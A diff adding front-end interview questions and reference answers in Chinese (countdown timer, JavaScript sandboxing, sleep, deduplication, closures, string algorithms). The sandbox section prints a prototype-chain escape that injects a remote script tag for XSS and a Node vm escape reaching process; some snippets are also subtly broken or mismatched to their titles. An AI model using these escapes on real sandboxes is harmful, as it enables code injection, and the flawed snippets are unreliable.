--- a/牛客刷题题目/前端校招面试题目合集.md
+++ b/牛客刷题题目/前端校招面试题目合集.md
@@ -5144,3 +5144,811 @@ function difference(array, ...rest) {
     })
 }
 ```
+
+------
+
+#### 8.11 倒计时，一开始就进行
+
+**参考答案：**
+
+题意：一旦进入页面倒计时就开始，因此在window.onload方法中调用倒计时方法
+
+```html
+<script type="text/javascript">
+  window.onload=function(){
+    countDown();
+    function addZero(i){
+      return i<10 ? "0"+i : i+"";
+    }
+    function countDown(){
+      let nowtime=new Date();
+      let endtime=new Date("2022/04/23,16:00:00");
+      let lefttime=parseInt((endtime.getTime()-nowtime.getTime())/1000);
+
+      if (lefttime<=0) {
+        document.querySelector("#count").innerHTML="活动已结束";
+        return;
+      }
+
+      let d=addZero(parseInt(lefttime/(24*60*60)));
+      let h=addZero(parseInt(lefttime/(60*60)%24));
+      let m=addZero(parseInt(lefttime/60%60));
+      let s=addZero(parseInt(lefttime%60));
+
+      document.querySelector("#count").innerHTML=`活动倒计时  ${d}天 ${h} 时 ${m} 分 ${s} 秒`;
+      setTimeout(countDown,1000);
+    }
+  }
+
+</script>
+```
+
+------
+
+#### 8.12 沙箱隔离怎么做的什么原理
+
+**参考答案：**
+
+沙箱，即sandbox，顾名思义，**就是让你的程序跑在一个隔离的环境下，不对外界的其他程序造成影响**，通过创建类似沙盒的独立作业环境，在其内部运行的程序并不能对硬盘产生永久性的影响。
+
+实现沙箱的三种方法
+
+1. 借助with + new Function
+
+首先从最简陋的方法说起，假如你想要通过eval和function直接执行一段代码，这是不现实的，因为代码内部可以沿着作用域链往上找，篡改全局变量，这是我们不希望的，所以你需要让沙箱内的变量访问都在你的监控范围内；不过，你可以使用with API，在with的块级作用域下，变量访问会优先查找你传入的参数对象，之后再往上找，所以相当于你变相监控到了代码中的“变量访问”：
+
+```js
+function compileCode (src) {      
+  src = 'with (exposeObj) {' + src + '}'    
+  return new Function('exposeObj', src)     
+}
+```
+
+接下里你要做的是，就是暴露可以被访问的变量exposeObj，以及阻断沙箱内的对外访问。通过es6提供的proxy特性，可以获取到对对象上的所有改写：
+
+```js
+function compileCode (src) {      
+  src = `with (exposeObj) { ${src} }`    
+  return new Function('exposeObj', src)     
+}    
+function proxyObj(originObj){    
+    let exposeObj = new Proxy(originObj,{    
+        has:(target,key)=>{    
+            if(["console","Math","Date"].indexOf(key)>=0){    
+                return target[key]    
+            }    
+            if(!target.hasOwnProperty(key)){    
+                throw new Error(`Illegal operation for key ${key}`)    
+            }    
+            return target[key]    
+        },
+    })    
+    return exposeObj    
+
+}    
+function createSandbox(src,obj){    
+ let proxy = proxyObj(obj)    
+ compileCode(src).call(proxy,proxy) //绑定this 防止this访问window    
+}
+```
+
+通过设置has函数，可以监听到变量的访问，在上述代码中，仅暴露个别外部变量供代码访问，其余不存在的属性，都会直接抛出error。其实还存在get、set函数，但是如果get和set函数只能拦截到当前对象属性的操作，对外部变量属性的读写操作无法监听到，所以只能使用has函数了。接下来我们测试一下：
+
+```js
+const testObj = {    
+    value:1,    
+    a:{    
+        b:    
+    }    
+}    
+createSandbox("value='haha';console.log(a)",testObj)
+```
+
+看起来一切似乎没有什么问题，但是问题出在了传入的对象，当调用的是console.log(a.b)的时候，has方法是无法监听到对b属性的访问的，假设所执行的代码是不可信的，这时候，它只需要通过a.b.**proto**就可以访问到Object构造函数的原型对象，再对原型对象进行一些篡改，例如将toString就能影响到外部的代码逻辑的。
+
+```js
+createSandbox(`    
+a.b.__proto__.toString = ()=>{    
+ new (()=>{}).constructor("var script = document.createElement('script');    
+ script.src = 'http://xss.js';
+ script.type = 'text/javascript';    
+ document.body.appendChild(script);")()    
+}
+`,testObj)    
+console.log(testObj.a.b.__proto__.toString())
+```
+
+例如上面所展示的代码，通过访问原型链的方式，实现了沙箱逃逸，并且篡改了原型链上的toString方法，一旦外部的代码执行了toString方法，就可以实现xss攻击，注入第三方代码；由于在内部定义执行的函数代码逻辑，仍然会沿着作用域链查找，为了绕开作用域链的查找，笔者通过访问箭头函数的constructor的方式拿到了构造函数Function，这个时候，Funtion内所执行的xss代码，在执行的时候，便不会再沿着作用域链往上找，而是直接在全局作用域下执行，通过这样的方式，实现了沙箱逃逸以及xss攻击。
+
+你可能会想，如果我切断原型链的访问，是否就杜绝了呢？的确，你可以通过Object.create(null)的方式，传入一个不含有原型链的对象，并且让暴露的对象只有一层，不传入嵌套的对象，但是，即使是基本类型值，数字或字符串，同样也可以通过**proto**查找到原型链，而且，即使不传入对象，你还可以通过下面这种方式绕过：
+
+```js
+({}).__proto__.toString= ()=>{console.log(111)};
+```
+
+可见，new Function + with的这种沙箱方式，防君子不防小人，当然，你也可以通过对传入的code代码做代码分析或过滤？假如传入的代码不是按照的规定的数据格式（例如json），就直接抛出错误，阻止恶意代码注入，但这始终不是一种安全的做法。
+
+2. 借助iframe实现沙箱
+
+前面介绍一种劣质的、不怎么安全的方法构造了一个简单的沙箱，但是在前端最常见的方法，还是利用iframe来构造一个沙箱
+
+```html
+<iframe sandbox src="..."></iframe>
+```
+
+但是这也会带来一些限制：
+
+1. script脚本不能执行
+
+2. 不能发送ajax请求
+
+3. 不能使用本地存储，即localStorage,cookie等
+
+4. 不能创建新的弹窗和window
+
+5. 不能发送表单
+
+6. 不能加载额外插件比如flash等
+
+   不过别方，你可以对这个iframe标签进行一些配置：
+
+   ![img](https://uploadfiles.nowcoder.com/images/20220301/4107856_1646122570684/3FD065D9D9BD5924FC83D859A251A3C9)
+
+接下里你只需要结合postMessage API，将你需要执行的代码，和需要暴露的数据传递过去，然后和你的iframe页面通信就行了。
+
+1）需要注意的是，在子页面中，要注意不要让执行代码访问到contentWindow对象，因为你需要调用contentWindow的postMessageAPI给父页面传递信息，假如恶意代码也获取到了contentWindow对象，相当于就拿到了父页面的控制权了，这个时候可大事不妙。
+
+2）当使用postMessageAPI的时候，由于sandbox的origin默认为null，需要设置allow-same-origin允许两个页面进行通信，意味着子页面内可以发起请求，这时候需要防范好CSRF，允许了同域请求，不过好在，并没有携带上cookie。
+
+3）当调用postMessageAPI传递数据给子页面的时候，传输的数据对象本身已经通过结构化克隆算法复制
+
+简单的说，通过postMessageAPI传递的对象，已经由浏览器处理过了，原型链已经被切断，同时，传过去的对象也是复制好了的，占用的是不同的内存空间，两者互不影响，所以你不需要担心出现第一种沙箱做法中出现的问题。
+
+3. nodejs中的沙箱
+
+nodejs中使用沙箱很简单，只需要利用原生的vm模块，便可以快速创建沙箱，同时指定上下文。
+
+```js
+const vm = require('vm');    
+const x = 1;    
+const sandbox = { x: 2 };    
+vm.createContext(sandbox); // Contextify the sandbox.    
+const code = 'x += 40; var y = 17;';    
+vm.runInContext(code, sandbox);    
+console.log(sandbox.x); // 42    
+console.log(sandbox.y); // 17    
+console.log(x); // 1;   y is not defined.
+```
+
+vm中提供了runInNewContext、runInThisContext、runInContext三个方法，三者的用法有个别出入，比较常用的是runInNewContext和runInContext，可以传入参数指定好上下文对象。
+
+但是vm是绝对安全的吗？不一定。
+
+```js
+const vm = require('vm');    
+vm.runInNewContext("this.constructor.constructor('return process')().exit()")
+```
+
+通过上面这段代码，我们可以通过vm，停止掉主进程nodejs，导致程序不能继续往下执行，这是我们不希望的，解决方案是绑定好context上下文对象，同时，为了避免通过**原型链逃逸**（nodejs中的对象并没有像浏览器端一样进行结构化复制，导致原型链依然保留），所以我们需要切断原型链，同时对于传入的暴露对象，只提供基本类型值。
+
+```js
+let ctx = Object.create(null);    
+ctx.a = 1; // ctx上不能包含引用类型的属性    
+vm.runInNewContext("this.constructor.constructor('return process')().exit()", ctx);
+```
+
+让我们来看一下TSW中是怎么使用的：
+
+```js
+const vm = require('vm');    
+const SbFunction = vm.runInNewContext('(Function)', Object.create(null));        // 沙堆    
+...    
+if (opt.jsonpCallback) {    
+  code = `var result=null; var ${opt.jsonpCallback}=function($1){result=$1}; ${responseText}; return result;`;    
+  obj = new SbFunction(code)();    
+}     
+...    
+```
+
+通过runInNewContext返回沙箱中的构造函数Function，同时传入切断原型链的空对象防止逃逸，之后再外部使用的时候，只需要调用返回的这个函数，和普通的new Function一样调用即可。
+
+------
+
+#### 8.13 实现一个 JS 的sleep
+
+**参考答案**：
+
+1. 普通版
+
+```js
+function sleep(sleepTime) {
+    for(var start = new Date; new Date - start <= sleepTime;) {}
+}
+var t1 = +new Date()
+sleep(3000)
+var t2 = +new Date()
+console.log(t2 - t1)
+
+```
+
+优点：简单粗暴，通俗易懂。
+
+缺点：这是最简单粗暴的实现，确实 sleep 了，也确实卡死了，CPU 会飙升，无论你的服务器 CPU 有多么 Niubility。
+
+2. Promise 版本
+
+```js
+function sleep(time) {
+  return new Promise(resolve => setTimeout(resolve, time))
+}
+
+const t1 = +new Date()
+sleep(3000).then(() => {
+  const t2 = +new Date()
+  console.log(t2 - t1)
+})
+```
+
+优点：这种方式实际上是用了 setTimeout，没有形成进程阻塞，不会造成性能和负载问题。
+
+缺点：虽然不像 callback 套那么多层，但仍不怎么美观，而且当我们需要在某过程中需要停止执行（或者在中途返回了错误的值），还必须得层层判断后跳出，非常麻烦，而且这种异步并不是那么彻底，还是看起来别扭
+
+3. Async/Await 版本
+
+```js
+function sleep(time){
+    return new Promise(resolve=>setTimeout(resolve,time));
+}
+
+!async function test(){
+    const t1=+new Date();
+    await sleep(3000);
+    const t2=+new Date();
+    console.log(t2-t1);
+}();
+```
+
+缺点： ES7 语法存在兼容性问题，**有 babel 一切兼容性都不是问题**
+
+更优雅的写法
+
+```js
+function sleep (time) {
+  return new Promise((resolve) => setTimeout(resolve, time));
+}
+
+// 用法
+sleep(500).then(() => {
+    // 这里写sleep之后需要去做的事情
+})
+```
+
+不要忘了开源的力量
+
+```js
+const sleep = require("sleep")
+const t1 = +new Date()
+sleep.msleep(3000)
+const t2 = +new Date()
+console.log(t2 - t1)
+
+```
+
+优点：能够实现更加精细的时间精确度，而且看起来就是真的 sleep 函数，清晰直白。
+
+------
+
+#### 8.14 实现一个数组对象的去重，相同value的只保留最后一个，最好有多个思路
+
+**参考答案**：
+
+**1.遍历数组法**
+
+它是最简单的数组去重方法（indexOf方法）
+
+实现思路：新建一个数组，遍历去要重的数组，当值不在新数组的时候（indexOf为-1）就加入该新数组中；
+
+```js
+var arr=[2,8,5,0,5,2,6,7,2];
+function unique1(arr){
+  var hash=[];
+  for (var i = 0; i < arr.length; i++) {
+     if(hash.indexOf(arr[i])==-1){
+      hash.push(arr[i]);
+     }
+  }
+  return hash;
+}
+
+```
+
+**2.数组下标判断法**
+
+调用indexOf方法，性能和方法1差不多
+
+实现思路：如果当前数组的第 i 项在当前数组中第一次出现的位置不是 i，那么表示第 i 项是重复的，忽略掉。否则存入结果数组。
+
+```js
+function unique2(arr){
+  var hash=[];
+  for (var i = 0; i < arr.length; i++) {
+     if(arr.indexOf(arr[i])==i){
+      hash.push(arr[i]);
+     }
+  }
+  return hash;
+}
+```
+
+**3.排序后相邻去除法**
+
+实现思路：给传入的数组排序，排序后相同的值会相邻，然后遍历排序后数组时，新数组只加入不与前一值重复的值。
+
+```js
+function unique3(arr){
+  arr.sort();
+  var hash=[arr[0]];
+  for (var i = 1; i < arr.length; i++) {
+     if(arr[i]!=hash[hash.length-1]){
+      hash.push(arr[i]);
+     }
+  }
+  return hash;
+}
+
+```
+
+**4.优化遍历数组法（推荐）**
+
+实现思路：双层循环，外循环表示从0到arr.length，内循环表示从i+1到arr.length
+
+将没重复的右边值放入新数组。（检测到有重复值时终止当前循环同时进入外层循环的下一轮判断）
+
+```js
+function unique4(arr){
+    var hash=[];
+    for (var i = 0; i < arr.length; i++) {
+      for (var j = i+1; j < arr.length; j++) {
+        if(arr[i]===arr[j]){
+          ++i;
+          j = i;
+        }
+
+      }
+        hash.push(arr[i]); 
+    }
+    return hash;
+}
+
+```
+
+**5.ES6实现**
+
+基本思路：ES6提供了新的数据结构Set。它类似于数组，但是成员的值都是唯一的，没有重复的值。
+
+Set函数可以接受一个数组（或类似数组的对象）作为参数，用来初始化。
+
+```js
+function unique5(arr){
+  var x = new Set(arr);
+ return [...x];
+}
+
+```
+
+扩展：如果重复，则去掉该元素
+
+**6.数组下标去重**
+
+```js
+function unique22(arr){
+  var hash=[];
+  for (var i = 0; i < arr.length; i++) {
+     if(arr.indexOf(arr[i])==arr.lastIndexOf(arr[i])){
+      hash.push(arr[i]);
+     }
+  }
+  return hash;
+}
+```
+
+------
+
+#### 8.15 function rand(min, max, N)：生成长度是N，且在min、max内不重复的整数随机数组
+
+**参考答案：**
+
+把考点拆成了4个小项；需要用递归算法实现：
+a) 生成一个长度为n的空数组arr。
+b) 生成一个（min－max）之间的随机整数rand。
+c) 把随机数rand插入到数组arr内，如果数组arr内已存在与rand相同的数字，则重新生成随机数rand并插入到 arr内[需要使用递归实现，不能使用for/while等循环]
+d) 最终输出一个长度为n，且内容不重复的数组arr。
+
+```js
+function buildArray(arr,n,min,max){
+    let num=Math.floor(Math.random()*(max-min+1))+min;
+    if (!arr.includes(num)) {
+        arr.push(num);
+    }
+    return arr.length===n ? arr : buildArray(arr,n,min,max);
+}
+
+const result=buildArray([],20,2,100);
+console.log(result);
+```
+
+------
+
+#### 8.16 闭包的理解
+
+**参考答案：**
+
+闭包：
+
+一个函数和对其周围状态（**lexical environment，词法环境**）的引用捆绑在一起（或者说函数被引用包围）， 这样的组合就是**闭包**（**closure**）。也就是说，**闭包让你可以在一个内层函数中访问到其外层函数的作用域**。在 JavaScript 中，**每当创建一个函数，闭包就会在函数创建的同时被创建出来。**
+
+闭包的特点：
+
+- 让外部访问函数内部变量成为可能；
+- 可以避免使用全局变量，防止全局变量污染；
+- 可以让局部变量常驻在内存中；
+- 会造成内存泄漏（有一块内存空间被长期占用，而不被释放）
+
+应用场景
+
+1. 埋点（是网站分析的一种常用的数据采集方法）计数器
+
+```js
+function count() {
+    var num = 0;
+    return function () {
+        return ++num
+    }
+}
+var getNum = count();
+var getNewNum = count();
+document.querySelectorAll('button')[0].onclick = function(){
+    console.log('点击加入购物车次数： '+getNum());
+}
+document.querySelectorAll('button')[1].onclick = function(){
+    console.log('点击付款次数： '+getNewNum());
+}    
+
+```
+
+2. 事件+循环
+
+按照以下方式添加事件，打印出来的i不是按照序号的
+
+形成原因就是操作的是同一个词法环境,因为onclick后面的函数都是一个闭包，但是操作的是同一个词法环境
+
+```js
+   var lis = document.querySelectorAll('li');
+   for (var i = 0; i < lis.length; i++) {
+            lis[i].onclick = function () {
+                alert(i)
+            }       
+    }
+```
+
+解决办法：
+
+使用匿名函数之后，就形成一个闭包， 操作的就是不同的词法环境
+
+```js
+var lis = document.querySelectorAll('li');  
+for (var i = 0; i < lis.length; i++) {
+     (function (j) {
+                lis[j].onclick = function () {
+                    alert(j)
+                }
+            })(i)
+ }
+
+```
+
+------
+
+#### 8.17 字符串中的单词逆序输出（手写）
+
+**参考答案：**
+
+方法一：
+
+```js
+function strReverse(str) {
+     return str.split("").reverse().join("") 
+}
+```
+
+方法二：
+
+```js
+function strReverse(str) {
+        var i=str.length;
+        var nstr = ""; 
+        i=i-1; 
+        for (var x = i; x >=0; x--) { 
+                nstr+=str.charAt(x)
+        }
+        return nstr
+}
+```
+
+方法三：
+
+```js
+function strReverse(str) {
+        if(str.length == 0)return null; 
+        var i = str.length; 
+        var dstr = ""; 
+        while(--i >= 0) 
+        { 
+            dstr += str.charAt(i);  
+        } 
+        return dstr; 
+}
+
+```
+
+方法四：
+
+```js
+function strReverse(str) {
+    return str.split('').reduce((prev, next) => next + prev);
+}
+
+```
+
+方法五：
+
+```js
+function strReverse(str) {
+        var newstr="";
+           for(var i=0;i<str.length;i++){
+               newstr=str.charAt(i)+newstr;
+           }
+           return newstr
+}
+
+```
+
+方法六：
+
+```js
+function strReverse(str) {
+            if(str.length===1){
+                return str
+            }
+            return str.slice(-1)+strReverse(str.slice(0,-1));
+}
+```
+
+------
+
+#### 8.18 **给定一个字符串，请你找出其中不含有重复字符的 最长子串 的长度**
+
+**参考答案：**
+
+思路分析：
+
+对字符串进行遍历，使用String.prototype.indexOf()实时获取遍历过程中的无重复子串并存放于str，并保存当前状态最长无重复子串的长度为res，当遍历结束时，res的值即为无重复字符的最长子串的长度。
+
+代码示例：
+
+```js
+/**
+ * @param {string} s
+ * @return {number}
+ */
+var lengthOfLongestSubstring = function(s) {
+    var res = 0; // 用于存放当前最长无重复子串的长度
+    var str = ""; // 用于存放无重复子串
+    var len = s.length;
+    for(var i = 0; i < len; i++) {
+      var char = s.charAt(i);
+      var index = str.indexOf(char);
+      if(index === -1) {
+        str += char;
+        res = res < str.length ? str.length : res;
+      } else {
+        str = str.substr(index + 1) + char;
+      }
+    }
+    return res; 
+};
+
+```
+
+------
+
+#### 8.19 去掉字符串前后的空格
+
+**参考答案：**
+
+第五种方法在处理长字符串时效率最高
+
+第一种：循环检查替换
+
+```js
+//供使用者调用  
+function trim(s){  
+    return trimRight(trimLeft(s));  
+}  
+//去掉左边的空白  
+function trimLeft(s){  
+    if(s == null) {  
+        return "";  
+    }  
+    var whitespace = new String(" \t\n\r");  
+    var str = new String(s);  
+    if (whitespace.indexOf(str.charAt(0)) !== -1) {  
+        var j=0, i = str.length;  
+        while (j < i && whitespace.indexOf(str.charAt(j)) !== -1){  
+            j++;  
+        }  
+        str = str.substring(j, i);  
+    }  
+    return str;  
+}  
+//去掉右边的空白 
+function trimRight(s){  
+    if(s == null) return "";  
+    var whitespace = new String(" \t\n\r");  
+    var str = new String(s);  
+    if (whitespace.indexOf(str.charAt(str.length-1)) != -1){  
+        var i = str.length - 1;  
+        while (i >= 0 && whitespace.indexOf(str.charAt(i)) != -1){  
+            i--;  
+        }  
+        str = str.substring(0, i+1);  
+    }  
+    return str;  
+} 
+
+```
+
+第二种：正则替换
+
+```js
+
+String.prototype.Trim = function()  {  
+    return this.replace(/(^\s*)|(\s*$)/g, "");  
+}  
+String.prototype.LTrim = function()  {  
+    return this.replace(/(^\s*)/g, "");  
+}  
+String.prototype.RTrim = function()  {  
+    return this.replace(/(\s*$)/g, "");  
+}  
+
+```
+
+第三种：使用jquery
+
+```js
+$.trim(str) 
+//jquery内部实现为：
+function trim(str){   
+    return str.replace(/^(\s|\u00A0)+/,'').replace(/(\s|\u00A0)+$/,'');   
+}   
+```
+
+第四种：使用motools
+
+```js
+function trim(str){   
+    return str.replace(/^(\s|\xA0)+|(\s|\xA0)+$/g, '');   
+}  
+
+```
+
+第五种：裁剪字符串方式
+
+```js
+function trim(str){   
+    str = str.replace(/^(\s|\u00A0)+/,'');   
+    for(var i=str.length-1; i>=0; i--){   
+        if(/\S/.test(str.charAt(i))){   
+            str = str.substring(0, i+1);   
+            break;   
+        }   
+    }   
+    return str;   
+}  
+
+```
+
+------
+
+#### 8.20 "判断输出console.log(0 == [])console.log([1] == [1])"
+
+**参考答案：**
+
+```js
+console.log([]==[]);  // false
+console.log([1]==[1]) //false
+
+console.log([]== 0);  // true
+```
+
+解析：
+
+原始值的比较是值的比较：
+它们的值相等时它们就相等（==）
+对象和原始值不同，对象的比较并非值的比较,而是引用的比较：
+即使两个对象包含同样的属性及相同的值，它们也是不相等的
+即使两个数组各个索引元素完全相等，它们也是不相等的,所以[]!=[]
+
+[]==0,是数组进行了隐士转换，空数组会转换成数字0，所以相等
+
+------
+
+#### 8.21 三数之和
+
+**参考答案：**
+
+题目描述
+
+给定一个包含 n 个整数的数组 nums，判断 nums 中是否存在三个元素 a，b，c ，使得 a + b + c = 0 ？找出所有满足条件且不重复的三元组。
+
+注意：答案中不可以包含重复的三元组。
+
+```
+//例如, 给定数组 nums = [-1, 0, 1, 2, -1, -4]，
+//满足要求的三元组集合为：
+[
+  [-1, 0, 1],
+  [-1, -1, 2]
+]
+```
+
+解答
+
+这题我们才用排序+双指针的思路来做，遍历排序后的数组，定义指针l和r,分别从当前遍历元素的下一个元素和数组的最后一个元素往中间靠拢，计算结果跟目标对比。
+
+```js
+var threeSum = function(nums) {
+    if(nums.length < 3){
+        return [];
+    }
+
+    let res = [];
+    // 排序
+    nums.sort((a, b) => a - b);
+    for(let i = 0; i < nums.length; i++){
+        if(i > 0 && nums[i] == nums[i-1]){
+            // 去重
+            continue;
+        }
+        if(nums[i] > 0){
+            // 若当前元素大于0，则三元素相加之后必定大于0
+            break;
+        }
+        // l为左下标，r为右下标
+        let l = i + 1; r = nums.length - 1;
+        while(l<r){
+            let sum = nums[i] + nums[l] + nums[r];
+            if(sum == 0){
+                res.push([nums[i], nums[l], nums[r]]);
+                while(l < r && nums[l] == nums[l+1]){
+                    l++
+                }
+                while(l < r && nums[r] == nums[r-1]){
+                    r--;
+                }
+                l++;
+                r--;
+            }else if(sum < 0){
+                l++;
+            }else if(sum > 0){
+                r--;
+            }
+        }
+    }
+
+    return res;
+};
+
+```
+
